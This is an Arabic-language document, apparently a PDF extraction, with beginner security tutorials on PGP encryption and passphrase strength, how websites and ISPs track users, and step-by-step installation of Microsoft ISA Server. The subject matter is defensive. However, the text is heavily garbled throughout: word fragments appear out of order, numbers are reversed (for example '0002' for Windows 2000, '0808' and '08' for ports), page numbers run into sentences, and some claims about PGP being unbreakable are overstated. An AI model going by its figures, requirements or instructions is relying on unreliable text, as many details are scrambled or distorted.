‫‪ PGP (Pretty Goog Privacy) Encryption Program‬‬ ‫إن ‪ PGP‬ھ و أفضل برنامج تشفیر لتشفیر ملفاتك وھو يعمل بھذه الطريقة‪ ::‬‬ ‫د‪ ‬‬ ‫عندما تشفر ملف ما بواسطة ‪ PGP‬تعمل ‪ PGP‬على ضغط الملف وھذا يساعد‬ ‫م‪ ‬‬ ‫مساحة القرص يعني يفیدك في أمرين ‪ -1‬التشفیر ‪ -2‬تقلیل الحجم‬


‫يعمل‪ ‬‬ ‫ل‬ ‫وھي تنشأ مايعرف بالـ ‪Session Key‬أي مفتاح جلسة ھذا ‪Session Key‬‬ ‫الملف‪ .‬‬ ‫‪.‬‬ ‫بشكل آمن جدا وذو شفرة قاعدة أو (لوغاريتم) خاصة لتشفیر‬ ‫‪ password‬‬ ‫‪p‬‬ ‫‪PGP‬يسألك عن) ‪ pass phrase‬العبارة التي وضعتھا) ولیس عن‬ ‫استخراج‪ ‬‬ ‫ج‬ ‫وھذا أكثر أمان ضد المھ اجمین الذين يستخدمون القوامیس في‬ ‫الباسوورد ‪ .‬عندما يقوم الشخص باستخدام جمیع الحروف في قاموس للحصول‬ ‫ل‬ ‫‪ Password‬‬ ‫‪P‬‬ ‫على‬ ‫ة‪ ‬‬ ‫ولما تستخدم ‪ pass phrase‬يمكن ان تدخل عبارة بالكامل بالحروف الكبیرة‬ ‫‪ ....‬‬ ‫والصغیر وايضا العداد من ‪ 0‬إلى ‪. 9‬‬ ‫الطرق لكسر التشفیر ‪ ::‬‬ ‫ل‪ ‬‬ ‫أكید إن ‪ PGP‬تم كتابتھا بواسطة أشخاص الي يبغون ملفاتھم مشفرة من قبل‬ ‫التامة‪ .‬‬ ‫‪.‬‬ ‫أشخاص أخرى ويريدون الخصوصیة والسرية‬ ‫لما ترسل ‪ E ­ mail‬يمكن قرائته من قبل أشخاص كثیرون دون علمك لكن لماا‪ ‬‬ ‫تستخدم ‪ PGP‬فقط الشخص للذي الرسالة الخاصة به يقرأھا‪ ..‬‬ ‫ن‪ ‬‬ ‫ألحین إنت تعلمت أھم الشیاء حول ‪ PGP‬والتشفیر أيضا تريد أن تعرف إذا كان‬ ‫ل!!‪ ‬‬ ‫بالمكان من كسر ھذا النوع من التشفیر أم !‬ ‫رسالة‪ ‬‬ ‫ة‬ ‫في الحقیقة لو استخدمت جمیع الجھزة الموجودة بالعالم لفك تشفیر‬ ‫ك‪ ‬‬ ‫‪PGP‬صغیرة يبغالھا ‪ 21‬ملیون مرة ھھھھھھھھھھھھھھھھھخخخخ يعني املك‬ ‫‪ 1%‬ھذا مايمیز التشفیر من نوع ‪ PGP‬لھ ذا يعد أفضل النواع ولأحد يقدرر‪ ‬‬ ‫يكسره‪ .‬‬ ‫‪.‬‬ ‫‪ 012‬‬ ‫‪ PASS PHRASE‬‬ ‫‪P‬‬ ‫عبارة التصريح ‪...‬‬ ‫ت‪ ‬‬ ‫أكید إن نوع التشفیر ‪ PGP‬قوي جدا لكن ھل من الممكن فتح الملفات‬ ‫؟!‪ ‬‬ ‫المشفرة بواسطته !‬ ‫ي‪ ‬‬ ‫بشرط واحد إذا كان الشخص غبي لدرجة أن يضع جمیلة التصريح والتي ھي‬ ‫‪pass phrase‬عبارة سھلة نوعا ماا‪ ‬‬ ‫مثل ‪ 987654321 :‬أو ‪ 654321‬أو اسمه الشخصي وھكذا‪ ....‬‬ ‫تشفیر‪ ‬‬ ‫ر‬ ‫أو أن يقوم بتخزينھ ا في ملف نصي واكید اذا احد وصل الملف يقدر يفك‬ ‫الملفات بسھولة وطبعا كل ماكانت عبارة ‪ pass‬طويلة كل ماكان صعب جداا‪ ‬‬ ‫ا‪ .‬‬ ‫العثور علیھ ‪.‬‬ ‫ه‪ ‬‬ ‫وبعضھ م يحاول استخدام تقنیة ‪ Brute­Forcing‬ليجاد الباسوورد حتى انه‬ ‫ممكن يغیر القاموس الخاص بالـ ‪Brute‬ويضع فیه العديد من الكلمات العشوائیة!!‬ ‫كذا‪ :‬‬ ‫‪:‬‬ ‫حاول تخلي العبارة الخاصة فیك اصعب من‬ ‫‪ 555 HeYiWiLl454254hhfFFfFuFdghdHGdGDgdgH‬‬ ‫حتى‪ ‬‬ ‫والمفروض تتأكد من إنك تضع عبارة صعبة جدا ذات حروف كبیرة وصغیرة ى‬ ‫المشفر‪ .‬‬ ‫‪.‬‬ ‫تضمن عدم التفكیر في كسر الملف‬ ‫لتقم بحذف ملفات ‪ TXT‬بعد استخدام التشفیر!! ؟‪ ‬‬ ‫ولكن‪ ‬‬ ‫ن‬ ‫أكید لما تنتھو من تشفیر الملفات بواسطة ‪ PGP‬لزم تحذف ملفات ‪TXT‬‬ ‫استخدامه‪ ‬‬ ‫ه‬ ‫في الحقیقة الملفات لتنحذف وبإمكان أي شخص إرجاعھ ا بمجرد‬ ‫برنامج ‪ Disk Recovery‬حتى لو كتبت الجملة بواسطة المحرر الدفتر لن ينحذف‬ ‫ف‬ ‫ة‪ ‬‬ ‫ملف ‪ txt‬لبد من وجوده في مكان ما في جھازك لذلك ھنالك أداة خاصة‬ ‫تسمى‪ ‬‬ ‫ى‬ ‫بالـ ‪PGP‬‬ ‫‪ PGP Secure Wipe‬‬ ‫ھ ذي الداة البسیطة تكمل عملیات حذف الملفات المحذوفة من جھازك وھكذاا‬ ‫المشفر‪ .‬‬ ‫‪.‬‬ ‫سوف يصلح فقط لديك الملف‬ ‫‪ Trojan & Virus‬‬ ‫‪T‬‬ ‫ماعلقة !‬ ‫ل‪ ‬‬ ‫علقة وثیقة فاحذر ان يحتوي جھازك على ‪ Key logger‬فھو يقوم بحفظ كل‬ ‫يقوم‪ ‬‬ ‫م‬ ‫ماكتب على لوحة المفاتیح وإرسالھا للمھاجم او المخترق وبذلك سوف‬ ‫السرية!!‪ ‬‬ ‫!‬ ‫بمعرف العبارة‬ ‫العبارات‪ ‬‬ ‫ت‬ ‫وأيضا ھنالك فیروسات خاصة صممت لتسرق ھذا النوع من‬ ‫‪ 112‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫وألحین أقولكم إن التشفیر بواسطة ‪ PGP‬يعتبر آمن لبعد الحدود وليمكن‪ ‬‬ ‫كسره إل إذا كان المستخدم ليؤمن علیه او يضع عبارات سھلة جدا او يحتوي‪ ‬‬ ‫جھ ازه على فیروس وتروجان او مفتاح التسجیل‪ ...‬‬ ‫لذلك إذا أمنت نفسك جیدا لن وليوجد أي شخص يستطیع كسر ھذا التشفیر‪ ‬‬ ‫‪ >­­­))............ PGP‬‬ ‫‪ http://www.pgpi.org/products/pgp/versions/freeware‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪ 212‬‬ ‫ماذا تعرف المواقع التى تزوره عنك؟‪ ‬‬ ‫عندما تتجول في حواري إنترنت‪ ،‬‬ ‫ص بك‪ ،‬‬ ‫تترك أثار أقدامك في كل مكان تزوره‪ .‬فالموقع الذي تمر به‪ ،‬یفتح سج ً خا ً‬ ‫ل‪ ‬‬ ‫ا‬ ‫یتضمن عنوان الموقع الذي جئت منه‪ ،‬نوع الكمبیوتر والمتصفح الذي تستخدمه‪ ،‬وعنوان رقم البي‬ ‫الدائم‪ ،‬أو المتغیر‪ ،‬للكمبیوتر الذي تتصل منه‪ .‬ویمكن تحت ظروف معینة‪ ،‬أن یتمكن‪ ‬‬ ‫الموقع من الحصول على عنوان بریدك اللكتروني‪ ،‬واسمك الحقیقي‪ .‬ویقول بعض الخبراء‪ ،‬‬ ‫أنه یمكن باستخدام بریمجات جافا‪ ،‬أو جافا سیكریب‪ ،‬أو أكتیف إكس‪ ،‬سرقة عنوان بریدك‪ ‬‬ ‫اللكتروني‪ ،‬وبعض المعلومات الخرى عنك‪ ،‬على الرغم من أن هذا العمل غیر قانوني‪ ‬‬ ‫تستطیع شل عمل جافا في إكسبلورر ‪ ،.2.3‬من خلل الوامر‪ ‬‬ ‫‪ View‬‬ ‫ثم‪ ‬‬ ‫‪ Options‬‬ ‫ثم‪ ‬‬ ‫‪ ،Advanced‬‬ ‫وإزالة علمتي الختیار من مربعي‪ ‬‬ ‫وفي نافیجیتور ‪ 0.3‬من خلل الوامر‪ ‬‬ ‫‪ Enable Java JIT compiler‬‬ ‫‪ .enable Java Logging‬‬ ‫‪ .Options‬‬ ‫ثم‪ ‬‬ ‫‪ Network Preferences‬‬ ‫ثم‪ ‬‬ ‫‪ 312‬‬ ‫‪ Languages‬‬ ‫وإزالة علمتي الختیار من مربعي‪ ‬‬ ‫‪ ،Enable Java‬و‪ enable JavaScript‬‬ ‫أسهل طریقة لمعرفة ما تسجله المواقع التي تزورها عنك‪ ،‬عادة‪ ،‬هي التوجه إلى موقع‪ ‬‬ ‫‪ )(www.consumer.net/analyze‬‬ ‫والنتظار قلی ً‪ ،‬قبل أن یكتشف هذا الموقع المعلومات‪ ،‬ویعرضها أمامك على الشاشة‪ .‬‬ ‫ل‪ ‬‬ ‫وتقدم أنت‪ ،‬معلوماتك الشخصیة‪ ،‬عندما تمل قسیمة الشتراك في خدمات أحد المواقع‪ .‬‬ ‫وننصحك في هذه الحالة‪ ،‬بالتأكد أو ً‬ ‫ل‪ ،‬من أن هذا الموقع "محترم"‪ ،‬ولن یسرب هذه‪ ‬‬ ‫المعلومات إلى جهات أخرى‪ ،‬قبل أن تقدم له هذه المعلومات‪ ..‬‬ ‫ف صغیًر على القرص الصلب لكمبیوترك‪ ،‬یسمى‪ ‬‬ ‫تضع معظم مواقع ویب‪ ،‬عندما تزورها‪ ،‬مل ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫"كوكي"‪ ‬‬ ‫‪ )(Cookie‬‬ ‫ن‪ ،‬خاصة إذا كان الموقع یتطلب منك‪ ‬‬ ‫بهدف جمع بعض المعلومات عنك‪ ،‬وهو مفید أحیا ً‬ ‫ا‪ ‬‬ ‫إدخال كلمة مرور تخولك بزیارته‪ .‬ففي هذه الحالة لن تضطر في كل زیارة لدخال تلك‪ ‬‬


‫قرصك‪ ‬‬ ‫ك‬ ‫الكلمة‪ ،‬إذ سیتمكن الموقع من اكتشافها بنفسه عن طریق "الكوكي"‪ ،‬الذي وضعه على‬ ‫اا‪ ‬‬ ‫ً‬ ‫ك‪ ‬‬ ‫الصلب‪ ،‬في الزیارة الولى‪ .‬لكن‪ ،‬یرى الكثیر من المستخدمین في ذلك انتهاك‬ ‫كنت‪ ‬‬ ‫لخصوصیاتهم أثناء التصفح‪ ،‬خاصة عندما یراقب "الكوكي" تحركاتك ضمن الموقع‪ .‬إذا ت‬ ‫ل ترغب أن یسجل الخرون "كوكیز" على قرصك الصلب‪ ،‬بهدف جمع بعض المعلومات عنك‪،،‬‬ ‫"كوكي"‪ ،‬‬ ‫‪،‬‬ ‫فبإمكانك تجهیز المتصفح الذي تستخدمه‪ ،‬بحیث یطلب موافقتك‪ ،‬قبل أن یحفظ أي‬ ‫‪ .(Accepting a Cookie‬‬ ‫‪.‬‬ ‫على قرصك الصلب ‪ ،Options‬ثم ‪ ،Network Preferences‬ثم‬ ‫والفضل‪ ‬‬ ‫ل‬ ‫مثل‪ ‬‬ ‫أن تستخدم برامج‪ ،‬ل‬ ‫بناء‪ ‬‬ ‫تحلل رموز الكوكي‪ ،‬وتعلمك ما إذا كان مفید ً أم ل‪ ،‬ثم نصحك بقبوله أو حذفه‪ ، ،‬ء‬ ‫اا‪ ‬‬ ‫التحلیل‪ .‬‬ ‫‪.‬‬ ‫على ذلك‬ ‫تدخل‪ ‬‬ ‫ل‬ ‫تتمثل أكبر المخاطر التي قد تواجهها‪ ،‬في ما تكتبه ضمن المجموعات الخباریة إذ‬ ‫‪ .(www.dejanews.com‬‬ ‫‪.‬‬ ‫رسائلك ضمن أرشیف (‬ ‫‪ ،‬حیث یمكن لي شخص الطلع علیها‪ ،‬الن‪ ،‬وربما بعد ‪ 02‬سنة‪ ،‬أیض ً‪ .‬قد تشارك‪ ..،‬‬ ‫اا‪ ‬‬ ‫‪ 412‬‬ ‫طائشة‪ ،‬‬ ‫‪،‬‬ ‫ب في بعض المجموعات الخباریة غیر المناسبة‪ ،‬وتكتب آرا ً‬ ‫عندما تكون شا ً‬ ‫اا‪ ‬‬ ‫ء‬ ‫أو‪ ‬‬ ‫لكن‪ ،‬علیك أن تعلم أن ما خطته یداك‪ ،‬قد یبقى إلى البد‪ ،‬وربما یطلع علیه أحفادك‪ ،‬و‬ ‫تنسى!‪ .‬‬ ‫‪.‬‬ ‫م كسلح ضدك‪ ،‬فإنترنت ل‬ ‫جهات أخرى! وقد یستخدم یو ً‬ ‫اا‪ ‬‬ ‫متعارضان‪ ‬‬ ‫ن‬ ‫أما ما تكتبه ضمن منتدیات الحوار والدردشة العربیة‪ ،‬فله وجهان‬ ‫إن‪ ‬‬ ‫الول‪ ،‬هو أن معظم هذه المنتدیات‪ ،‬ل تحتفظ بما یكتب فیها لفترات طویلة‪ .‬وحتى ن‬ ‫احتفظت بها وأرشفتها‪ ،‬فإن معظمها ل یوفر أدوات بحث فعالة للتنقیب ضمن الرشیف‪،،‬‬ ‫أقل‪ .‬‬ ‫‪.‬‬ ‫وهذا یعني أن احتمال اكتشافها على المدى البعید‬ ‫قانونیة‪ ‬‬ ‫ة‬ ‫الوجه الثاني‪ ،‬هو أن الرقابة في المجتمعات العربیة أكبر‪ .‬فلو طلبت أي جهة‬ ‫من المنتدى ومزود خدمات إنترنت‪ ،‬الكشف عن كاتب إحدى الرسائل‪ ،‬أو المشاركین في‬ ‫ي‬ ‫د‪ .‬وسوف ُعرف كاتبه‪،،‬‬ ‫الدردشة‪ ،‬فسوف یتم ذلك بسهولة‪ ،‬إذا كان ما كتبه ل زال موجو ً‬ ‫اا‪ ‬‬ ‫ی‬ ‫زائفین‪ .‬‬ ‫‪.‬‬ ‫ی‬ ‫برید‬ ‫ن‬ ‫وعنوا‬ ‫م‬ ‫ً‬ ‫حتى إن كان یستخدم اس ً‬ ‫ً‬ ‫اا‪ ‬‬ ‫ا‬ ‫ا‬ ‫‪ 512‬‬ ‫ة‪ ‬‬ ‫شرح وظیفة ‪ Isa‬لحل كثیر من المشاكل المنیة على الشبكة‬ ‫الشمالى‪ ‬‬ ‫ى‬ ‫للكاتب‪:‬‬ ‫الشبكات‪ ‬‬ ‫ت‬ ‫مع زيادة إستخدام شبكة النترنت في الشبكات المحلیة سواء لربط‬ ‫حماية‪ ‬‬ ‫ة‬ ‫الفرعیة أو وصول الزبائن أو نشر التطبیقات ‪ ،‬كان لبد من وجود برنامج‬ ‫متكامل يمنع كل الخطار المحتملة من النترنت ‪ ،،‬‬ ‫ج‪ ‬‬ ‫وبرنامج ‪ Microsoft Internet Security and Acceleration ISA‬ھو من البرامج‬ ‫المنیة‪ ‬‬ ‫ة‬ ‫المثالیة لذالك ‪ ،‬فھ و يقدم ادوات وقدرة كبیرة لحل كثیر من المشاكل‬ ‫على الشبكة وتحكم شبه كامل بكل منافذ الدخول والخروج من الشبكة ‪ ،،‬‬ ‫سريعة‪ ‬‬ ‫ة‬ ‫وبلضافة لذالك فھو يعمل كبروكسي للشبكة لوصلھ ا بالنترنت بطريقة‬ ‫بطريقة‪ ‬‬ ‫ة‬ ‫حیث يمثل مصدر للطلبات لكل زبائن الشبكة حیث يعرض الطلبات‬ ‫الوصول‪ ‬‬ ‫ل‬ ‫دينمیكیة من ذاكرة الخادم بدل النترنت ‪ ،‬ويكون بذاك اسرع من‬ ‫مباشرة‪ ‬‬ ‫ة‬ ‫للنترنت بصورة‬ ‫ة‪ ‬‬ ‫خادم ‪ Microsoft Internet Security and Acceleration ISA‬يعطي قیمة كبیرة‬ ‫للشبكة وقدرة على التحكم لمن يطمعون في الوصول إلى نتائج أمن مرضیة ‪ ،،‬‬ ‫فرع‪ ‬‬ ‫فھ و برنامج يعمل على كل الحجوم من الشبكات ‪ ،‬شبكة مكتب صغیر ‪ ،‬ع‬ ‫شركة ‪ ،‬مواقع تجارة الكترونیة ‪ ،‬مز ّدو خدمات النترن ِ (مز ّدو خدمة النترنت))‬ ‫وو‪ ‬‬ ‫و ت‬


‫وشركات إستضافة مواقع وي ِ‪ ..‬‬ ‫ب‪ ‬‬ ‫ب‬ ‫خادم ‪ ISA‬يمكن أن ينشر كبرنامج حماية يقوم مقام بوابة بین النترنت والشبكة‬ ‫ة‬ ‫في‪ ‬‬ ‫الداخلیة مع سیاسات وصول متكاملة تجعل المدراء يتبعون منھج دقیق ي‬ ‫خبیث‪ .‬‬ ‫‪.‬‬ ‫تدقیق وإعطاء ومنع الوصول غیر المخول وكشف كل محتوى‬ ‫‪ ISA‬‬ ‫ج ‪I‬‬ ‫تثبیت البرنامج‬ ‫مع‪ ‬‬ ‫تثبیت البرنامج ھو في غاية السھ ولة لمن له خبرة بسیطة في التعامل ع‬ ‫بك‪ ‬‬ ‫برامج وتطبیقات مايكروسوفت ‪ ،‬فبعد أن تكون قد اشتريت النسخة الخاصة ك‬ ‫م‪ ‬‬ ‫علیك بتفحص المتطلبات الرئیسیة لتركیب الخادم على شبكتك ‪ ،‬ومن أھم‬ ‫مايلي‪ :-‬‬ ‫‪:‬‬ ‫ذالك‬ ‫ى‪ ‬‬ ‫جھاز بنتیوم ‪ megahertz 003 - 2‬حد أدنى‬ ‫‪ 612‬‬ ‫‪ Microsoft Windows‬‬ ‫‪M‬‬ ‫نظام التشغیل يجب أن يكون أحد النظم التالیة ‪0002‬‬ ‫‪ , Microsoft Windows 2000 Advanced‬‬ ‫‪,‬‬ ‫‪Server‬مع ‪ Service Pack 1‬أو أعلى‬ ‫‪ Microsoft Windows‬‬ ‫‪M‬‬ ‫‪Server‬مع ‪ Service Pack 1‬أو اعلى‪ ,‬أو ‪0002‬‬ ‫‪ Datacenter Server‬‬ ‫‪ memory‬‬ ‫‪m‬‬ ‫‪256 MB‬من الــ‬ ‫ب‪ ‬‬ ‫‪20 MB‬من المساحة الحرة على القرص الصلب‬ ‫ة‪ ‬‬ ‫كرت شبكة يكون متوافق مع الويندوز ‪ 0002‬للوصول للشبكة الداخلیة‬ ‫‪ NTFS‬‬ ‫‪N‬‬ ‫مقطع يكون بنظام‬ ‫م‬ ‫إذا كنت ستركب البرنامج كـ ‪ array‬وتريد تطبیق سیاسة المن المتقدم يجب أن‬ ‫ن‬ ‫‪ Active Directory‬‬ ‫‪A‬‬ ‫تكون الشبكة وخادم الشبكة علیه الدلیل النشط‬ ‫ط‬ ‫التثبیت‪ ‬‬ ‫ت‬ ‫نوعیة‬ ‫‪ ISA‬‬ ‫‪I‬‬ ‫لنوعیة التثبیت أھ میة كبیرة في تثبیت البرنامج وذالك بإختیار صفة خادم‬ ‫ھل سیكون خادم مستقل ام سیكون ‪ ، array‬والفرق بین الخادم المستقل والــ‬ ‫ط‪ ‬‬ ‫‪array‬ھو الـ ‪ array‬يتم التعامل مع نظام الشبكة كـ میدان في دلیل نشط‬ ‫الخادم‪ ‬‬ ‫م‬ ‫ويأخذ كل بیانات المستخدمین من قاعدة بیانات ذالك الدلیل ‪ ،‬وفي‬ ‫المستقل ‪ stand­alone server‬ل يتطلب وجود میدان ول دلیل نشط ‪ ،‬وإذاا‪ ‬‬ ‫كانت ھذه اول مرة تثبت فیھا خادم ‪ ISA‬على الجھ از وكنت تريد التثبیت يكون كــ‬ ‫ت‪ ‬‬ ‫‪array‬فیجب علیك أو ً ان تثبت ‪ ISA Server schema‬وھو برنامج صغیر يثبت‬ ‫ل‪ ‬‬ ‫ل‬ ‫في الدلیل النشط مرة واحدة فقط ولیس علیك تثبیته مرة أخرى حتى لو حذفت‬ ‫ت‬ ‫خادم ‪ ISA‬من الشبكة واردت تثبیته مرة ثانیة‪ ..‬‬ ‫م‪ ‬‬ ‫فإذا كان لديك میدان مع دلیل نشط ‪ Active Directory‬ل تركب البرنامج ( خادم‬ ‫‪ stand­alone server‬‬ ‫‪s‬‬ ‫( ‪ISA‬إل كـ ‪ ، array‬وإن كان بإمكانك تثبیته كـ‬ ‫التثبیت‪ ‬‬ ‫ت‬ ‫خصائص‬ ‫‪ 712‬‬ ‫يلي‪ :-‬‬ ‫‪:‬‬ ‫يمكن التثبیت على ثلث أشكال وھي على التوالي كما‬ ‫‪ firewall‬‬ ‫‪ cache‬‬ ‫‪ integrated‬‬ ‫ن‪ ‬‬ ‫أن نمط ‪ integrated‬يجمع كل ممیزات الثنین‬ ‫خطوة‪ ‬‬ ‫ة‬ ‫التثبیت خطوة‬ ‫‪ array‬‬ ‫‪a‬‬ ‫سنقوم بتثبیت البرنامج كــ‬ ‫القراص‪ ‬‬ ‫ص‬ ‫أدخل القرص الیزري للبرنامج في محرك‬ ‫‪I‬‬ ‫‪Install ISA Server‬‬ ‫سیعمل القرص ويفتح نافذة تثبیت البرنامج ‪ ،‬اضغط على‬ ‫ى‬ ‫اكمل‪ ‬‬ ‫ل‬ ‫تظھر لك شاشة الترحیب‬ ‫تابع‪ ‬‬ ‫ثم شاشة رقم تسجیل البرنامج أدخل الرقم ثم ع‬ ‫‪ I Agree‬‬ ‫‪I‬‬ ‫شاشة التفاقیة اضغط على‬ ‫ى‬ ‫‪ Full‬‬ ‫اختر ‪F‬‬ ‫ر‬ ‫اختیار نوع التثبیت ‪Typical , Full , Custom‬‬


‫م‪ ‬‬ ‫السؤال عن رغبتك في تثبیت البرنامج كـ ‪ array‬أو ‪ stand­alone‬اضغط نعم‬ ‫‪ array‬‬ ‫‪a‬‬ ‫اكتب اسم لھذا الـ‬ ‫‪ Use default policy settings‬‬ ‫‪U‬‬ ‫من ھ ذه الشاشة اختر نوع إعدادت المن اختر‬ ‫ر‬ ‫الخیر‪ ‬‬ ‫ر‬ ‫ثم من الشاشة التالیة اختر شكل ونوع الخادم الذي تريد اختر الخیار‬ ‫‪ 812‬‬ ‫يخبر برنامج التثبیت أن البرنامج سیعطل المنافذ ‪ 0808‬و ‪ 08‬من اجل خادم ‪I‬‬ ‫‪IIS‬‬ ‫المقطع‪ ‬‬ ‫ع‬ ‫من النافذة التالیة اختر مكان التثبیت اختر نفس‬ ‫لديك‪ ‬‬ ‫في النافذة التالیة اكتب مجال العناوين ك‬ ‫‪ 912‬‬ ‫اء‪ ‬‬ ‫تبدأ عملیة التثبیت وسینتھي سريعً ‪ ،‬ثم تظھ ر لك نافذة تخبرك عن إنتھ ء‬ ‫اا‪ ‬‬ ‫التثبیت‪ ‬‬ ‫ت‬ ‫عملیة‬ ‫افتح البرنامج ستجد كثیر من الدوات التي تتحكم بھاا‪ ‬‬ ‫‪ ISA‬‬ ‫م ‪I‬‬ ‫تمكین الوصول للنترنت على خادم‬ ‫د‪ ‬‬ ‫في كثیر من الحیان يكون الوصول للنترنت من خادم ‪ ISA‬غیر ممكن عند‬ ‫على‪ ‬‬ ‫التثبیت الول ولتمكین التصال يجب تأھیل بعض البروتوكولت للعمل ى‬ ‫الخادم مثل بروتوكول ‪ HTTPS‬و بروتوكول ‪ HTTP‬وفي الصورة المرفقة بالمرفقات‬ ‫ت‬ ‫الخادم‪ ‬‬ ‫م‬ ‫كل البروتوكولت المھ مة التي يجب أن تعمل على‬ ‫البروتوكول‪ ‬‬ ‫ل‬ ‫تأھیل‬ ‫‪ 022‬‬ ‫افتح خادم ‪ ISA‬ثم من على اسم الـ ‪ array‬ثم من ‪ ، IP Packet Filters‬من ھناا‬ ‫تمنع‪ ‬‬ ‫تمكن أي بروتوكول من الدخول أو الخروج وكذالك يمكن أن ع‬ ‫‪ create the IP Packet Filters‬‬ ‫‪c‬‬ ‫من الخیارات التي تكون في الجھة الیمین اختر‬ ‫عن‪ ‬‬ ‫سیفتح لك معالج في النافذة الولي اختر اسم للعملیة ولیكن اسم معبر ن‬ ‫ورقم‪ ‬‬ ‫م‬ ‫البروتوكول المراد تأھ یله ثم اكمل باقي النوافذ بالبروتوكول المناسب‬ ‫المنفذ‪ ‬‬ ‫ذ‬ ‫تتكرر‪ ‬‬ ‫ر‬ ‫وقبل تأھ یل أي بروتوكول راجع البروتوكولت الموجودة من قبل حتى ل‬ ‫البروتوكول‪ ‬‬ ‫ل‬ ‫عملیة التأھیل مرتین لنفس‬ ‫أي‪ ‬‬ ‫وكذالك دون كل عملیة تقوم بھا حتى ترجع إلیھا بسھولة عند حدوث ي‬ ‫التصال‪ ‬‬ ‫ل‬ ‫مشكلة في‬ ‫‪ 122‬‬ ‫المزود؟‪ ‬‬ ‫؟‬ ‫ماذا یعرف عنك‬ ‫ماذا‪ ‬‬ ‫ا‬ ‫یظن بعض مستخدمي إنترنت‪ ،‬وخاصة المبتدئین منهم‪ ،‬أن ل أحد یستطیع اكتشاف‬ ‫التسجیل‪ ‬‬ ‫ل‬ ‫یفعلون على إنترنت‪ :‬المواقع التي یزورونها‪ ..‬المعلومات التي یقدمونها أثناء‬ ‫غرف‪ ‬‬ ‫في بعض المواقع‪ ،‬أو الشراء‪ ..‬الحوارات التي یشاركون فیها ضمن المنتدیات أو في ف‬ ‫التي‪ ‬‬ ‫الدردشة‪ ..‬الرسائل التي یكتبونها للمجموعات الخباریة الكلمات والعبارات ي‬ ‫یجلبونها‪ ..‬‬ ‫‪.‬‬ ‫ینقبون عنها باستخدام محركات البحث‪ ..‬الملفات التي‬ ‫إلكتروني‪ ‬‬ ‫ي‬ ‫ویعتقد بعض هؤلء أنه یكفي أن تدخل ساحات الحوار باسم مستعار وعنوان برید‬ ‫بأجمعه‪ ‬‬ ‫ه‬ ‫زائف‪ ،‬كي تخفي هویتك عن العالم‬ ‫كل‪ ‬‬ ‫كل هذه المعتقدات خرافات ل أساس لها من الصحة‪ .‬فأخوك الكبر ل ینام‪ ،‬ویسجل ل‬ ‫عنك!‪ ‬‬ ‫!‬ ‫حركاتك وسكناتك‪ ..‬ومضیفوك فضولیون وقادرون على جمع الكثیر من المعلومات‬ ‫إنترنت‪ ‬‬ ‫ت‬ ‫لكن‪ ،‬من هو الخ الكبر؟ إنه الجهة التي تصلك بإنترنت‪ ،‬وهي إما مزود خدمات‬ ‫الرئیسي‪ ‬‬ ‫ي‬ ‫‪ )(ISP‬‬ ‫معه‪ ‬‬ ‫الذي تشترك ه‬ ‫أو كمبیوتر مؤسستك‪ ،‬إذا كانت تتصل بإنترنت عن طریق خط خاص مؤجر أما مضیفوك‪ ،‬فهم‬ ‫م‬ ‫إنترنت‪ ‬‬ ‫ت‬ ‫المواقع التي تزورها وأنت تبحر في عباب‬ ‫جهتین‪ ‬‬ ‫ن‬ ‫تخترق خصوصیتك في الشبكة من‬ ‫ل‪ ‬‬ ‫ل‬ ‫مزودك بخدمة التصال بإنترنت وهو اختراق یمكن أن یكون شام ً‪ ‬‬


‫اختراق‪ ‬‬ ‫ق‬ ‫المواقع التي تزورها‪ ،‬ومنتدیات الحوار التي تشارك فیها‪ ،‬أیً كان نوعها‪ ،‬وهو‬ ‫اا‪ ‬‬ ‫أحیان‪ ‬‬ ‫ن‬ ‫جزئي‪ ،‬لكنه خطر‪،‬‬ ‫الواقعیة‪ ‬‬ ‫ة‬ ‫ربما تسلل الخوف إلیك بعد قراءة السطور السابقة‪ ،‬لكن‪ ،‬تعال نتبین الصورة‬ ‫ذلك‪ ‬‬ ‫لكل ك‬ ‫؟‪ ‬‬ ‫ماذا یسجل مزود خدمات إنترنت عنك ؟‬ ‫تتصل‪ ‬‬ ‫ل‬ ‫یمكن لمزود خدمات إنترنت‪ ،‬من الناحیة النظریة‪ ،‬أن یكتشف كل أفعالك عندما‬ ‫‪ 222‬‬ ‫اطلعت‪ ‬‬ ‫ت‬ ‫بالشبكة‪ ،‬ویشمل ذلك‪ ،‬عناوین المواقع التي زرتها‪ ،‬ومتى كان ذلك‪ ،‬والصفحات التي‬ ‫فیها‪ ،‬‬ ‫‪،‬‬ ‫علیها‪ ،‬والملفات التي جلبتها‪ ،‬والكلمات التي بحثت عنها‪ ،‬والحوارات التي شاركت‬ ‫والخدمات‪ ‬‬ ‫ت‬ ‫والبرید اللكتروني الذي أرسلته واستقبلته‪ ،‬وفواتیر الشراء التي ملتها‪،‬‬ ‫مزود‪ ‬‬ ‫د‬ ‫التي اشتركت بها‪ .‬لكن‪ ،‬تختلف من الناحیة الفعلیة‪ ،‬كمیة المعلومات التي یجمعها‬ ‫مزود‪ ‬‬ ‫د‬ ‫خدمات إنترنت عنك‪ ،‬باختلف التقنیات والبرمجیات التي یستخدمها‪ .‬فإذا لم یكن‬ ‫الحزم‪ ‬‬ ‫م‬ ‫الخدمة یستخدم مزودات بروكسي (تتسلم وتفلتر كل طلباتك)‪ ،‬وبرمجیات تحسس‬ ‫ك‪ ‬‬ ‫" ‪ ) "packet sniffer‬تحلل حركة المرور بتفصیل كبیر)‪ ،‬فقد ل یسجل عنك‪ ،‬سوى بیاناتك‬ ‫ك‪ ‬‬ ‫الشخصیة‪ ،‬ورقم ‪ IP‬الخاص بالكمبیوتر المتصل‪ ،‬وتاریخ وزمن اتصالك بالشبكة‪ ،‬وانفصالك‬ ‫بالبرمجیات‪ ‬‬ ‫ت‬ ‫عنها‪ .‬أما إذا كان اتصالك یمر عبر "بروكسي"‪ ،‬فترتبط مستوى التفصیلت‬ ‫النظري‪ ،‬‬ ‫‪،‬‬ ‫التي یستخدمها مزود الخدمة‪ ،‬والتي یمكن أن تصل في حدها القصى‪ ،‬إلى المستوى‬ ‫مؤجر‪ ،‬‬ ‫‪،‬‬ ‫ق‪ .‬وینطبق ما ذكرناه‪ ،‬في حال كان اتصالك یتم عبر خط خاص‬ ‫الذي أشرنا إلیه ساب ً‬ ‫اا‪ 